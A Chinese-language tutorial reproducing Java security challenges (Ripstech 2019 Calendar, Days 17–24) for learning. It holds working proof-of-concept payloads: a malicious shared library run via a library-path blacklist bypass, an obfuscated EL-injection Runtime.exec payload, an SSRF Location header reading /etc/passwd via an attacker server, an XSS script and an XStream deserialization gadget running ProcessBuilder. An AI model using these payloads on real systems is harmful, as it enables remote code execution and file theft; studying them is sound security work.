Ripstech Java Security 2019 Calendar复现系列(四) 教学文档<\/h1>

Day17 Library注入<\/h2>

漏洞原理<\/h3>
系统允许上传任意扩展名和Content-Type的文件到\/var\/myapp\/data目录<\/li>
通过cookie中的env段设置环境变量时，对变量名检查不严格（虽然禁止以"java"、"os"、"file"开头，但可通过.java.xxx绕过）<\/li>
攻击者可设置java.library.path为上传目录，通过System.loadLibrary()加载恶意库文件<\/li> <\/ol>
复现步骤<\/h3>
环境搭建：IDEA + maven-archetype-webapp<\/p> <\/li>
配置web.xml添加servlet映射<\/p> <\/li>
实现文件上传功能：<\/p>
\/\/ 安全文件上传代码，允许任意内容类型和扩展名
<\/span><\/span><\/span><\/span>String uploadPath =<\/span> "\/var\/myapp\/data"<\/span>;<\/span>
<\/span><\/span>\/\/ ...文件上传处理逻辑
<\/span><\/span><\/span><\/code><\/pre><\/li>

构造恶意库文件：<\/p>
#define _GNU_SOURCE
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>__attribute__ ((__constructor__)) void<\/span> preload (void<\/span>){
<\/span><\/span>    system("id"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译：gcc -shared -fPIC libDEOBFUSCATION_LIB.c -o libDEOBFUSCATION_LIB.so -ldl<\/code><\/p>
<\/li>

上传恶意库文件并设置环境变量：<\/p>

在MAC OS上需使用.dylib后缀<\/li>
通过.java.library.path绕过黑名单检查<\/li>
<\/ul>
<\/li>
<\/ol>
Day18 会话固定攻击<\/h2>
漏洞原理<\/h3>

会话变量可由用户通过config参数控制<\/li>
存在会话固定漏洞，攻击者可预设受害者的会话ID<\/li>
通过控制last_command会话变量实现命令注入<\/li>
<\/ol>
复现步骤<\/h3>


环境搭建：IDEA + maven-archetype-webapp<\/p>
<\/li>

配置web.xml添加servlet映射<\/p>
<\/li>

实现验证逻辑：<\/p>
private<\/span> boolean<\/span> validBasicAuthHeader<\/span>(<\/span>HttpServletRequest request){<\/span>
<\/span><\/span>    \/\/ 检查密码是否为"password_of_day18"
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

攻击流程：<\/p>

攻击者获取自己的JSESSIONID<\/li>
设置last_command：?config=last_command@ls<\/code><\/li>
构造链接使管理员绑定攻击者的会话ID：?config=JSESSIONID@攻击者ID&save_session=yes<\/code><\/li>
管理员验证后执行预设命令<\/li>
<\/ul>
<\/li>
<\/ol>
Day19 EL注入<\/h2>
漏洞原理<\/h3>

用户输入通过eval()执行EL表达式<\/li>
虽然有限制（必须以"开头，黑名单过滤），但可通过反射和编码绕过<\/li>
利用ScriptEngineManager执行任意代码<\/li>
<\/ol>
复现步骤<\/h3>

环境搭建：IDEA + maven-archetype-webapp<\/li>
配置web.xml添加servlet映射<\/li>
构造payload：
""<\/span>.<\/span>equals<\/span>(<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>.<\/span>class<\/span>.<\/span>getConstructor<\/span>()<\/span>
<\/span><\/span>  .<\/span>newInstance<\/span>().<\/span>getEngineByExtension<\/span>(<\/span>"js"<\/span>)<\/span>
<\/span><\/span>  .<\/span>eval<\/span>(<\/span>"java.lang.Auntime.getAuntime().exec(\"touch+\/tmp\/owned.jsp\")"<\/span>
<\/span><\/span>  .<\/span>replaceAll<\/span>(<\/span>"A"<\/span>,<\/span>"R"<\/span>)))<\/span>
<\/span><\/span><\/code><\/pre>
使用字符串替换绕过关键字过滤<\/li>
空格替换为+避免正则匹配<\/li>
<\/ul>
<\/li>
<\/ol>
Day20 LDAP盲注<\/h2>
漏洞原理<\/h3>

用户输入直接拼接到LDAP查询<\/li>
虽然过滤了uuid等敏感字段，但description等字段可被利用<\/li>
通过盲注获取管理员createtimestamp生成API token<\/li>
<\/ol>
复现步骤<\/h3>


环境搭建：LDAP + Docker<\/p>
docker pull osixia\/openldap:1.3.0
<\/span><\/span>ldapadd -x -H ldap:\/\/localhost:389 -D "cn=admin,dc=example,dc=org"<\/span> -w admin -f test.ldif
<\/span><\/span><\/code><\/pre><\/li>

编写盲注脚本：<\/p>
import<\/span> requests
<\/span><\/span>import<\/span> string
<\/span><\/span># 通过description字段盲注获取信息<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
Day21 Padding Oracle攻击<\/h2>
漏洞原理<\/h3>

使用AES-CBC模式解密用户输入<\/li>
通过BadPaddingException泄露信息<\/li>
利用CBC的延展性逐字节破解明文<\/li>
<\/ol>
复现步骤<\/h3>

环境搭建：IDEA + springmvc<\/li>
修正代码：req.getParameter("c").toCharArray()<\/code><\/li>
配置Spring相关XML文件<\/li>
编写攻击脚本：
# 通过发送特制密文，观察响应是否出现"Invalid Padding"<\/span>
<\/span><\/span># 逐步推导Intermediary Value<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
Day22 SSRF<\/h2>
漏洞原理<\/h3>

允许设置Location头进行重定向<\/li>
对Location值的检查不严格（只需包含http:\/\/）<\/li>
通过file协议读取本地文件<\/li>
<\/ol>
复现步骤<\/h3>


搭建恶意HTTP服务器：<\/p>
# 返回包含恶意Location头的响应<\/span>
<\/span><\/span>Location: file:\/\/\/<\/span>etc\/<\/span>passwd#http:\/\/www.baidu.com<\/span>
<\/span><\/span><\/code><\/pre><\/li>

触发SSRF：

http:\/\/victim\/day22?url=http:\/\/attacker-server\/<\/code><\/p>
<\/li>
<\/ol>
Day23 格式化字符串漏洞<\/h2>
漏洞原理<\/h3>

使用format()函数处理用户输入<\/li>
通过%s触发Calendar对象中恶意对象的toString()<\/li>
SimpleTimeZone的id参数未过滤导致XSS<\/li>
<\/ol>
复现步骤<\/h3>

修正日期解析格式：yyyy-MM-dd'T'HH:mm:ss<\/code><\/li>
构造payload：

day23?id=<script>alert(1)<\/script>&current_time=2013-06-28T00:00:00%2B00:00&name=%25shello<\/code><\/li>
<\/ol>
Day24 对象注入漏洞<\/h2>
漏洞原理<\/h3>

用户输入的XML通过XStream反序列化<\/li>
虽然XPath限制了User节点，但User内部可包含Invoker子类<\/li>
Invoker的readObject方法可执行任意方法<\/li>
<\/ol>
复现步骤<\/h3>

可选修正：修改password字段类型为Object<\/li>
构造恶意XML：
<com.ananaskr.day24.User<\/span> serialization=<\/span>"custom"<\/span>><\/span>
<\/span><\/span>  <com.ananaskr.day24.Invoker<\/span> serialization=<\/span>"custom"<\/span>><\/span>
<\/span><\/span>    <a><string><\/span>touch<\/string><string><\/span>\/tmp\/abc<\/string><\/a><\/span>
<\/span><\/span>    <c><\/span>java.lang.ProcessBuilder<\/c><\/span>
<\/span><\/span>    <m><\/span>start<\/m><\/span>
<\/span><\/span>  <\/com.ananaskr.day24.Invoker><\/span>
<\/span><\/span><\/com.ananaskr.day24.User><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
总结<\/h2>
本系列涵盖了多种Java安全漏洞，包括：<\/p>

库文件注入<\/li>
会话固定<\/li>
EL表达式注入<\/li>
LDAP注入<\/li>
Padding Oracle攻击<\/li>
SSRF<\/li>
格式化字符串漏洞<\/li>
不安全的反序列化<\/li>
<\/ul>
每种漏洞都展示了从环境搭建到利用的完整过程，是学习Java安全的重要实践材料。<\/p>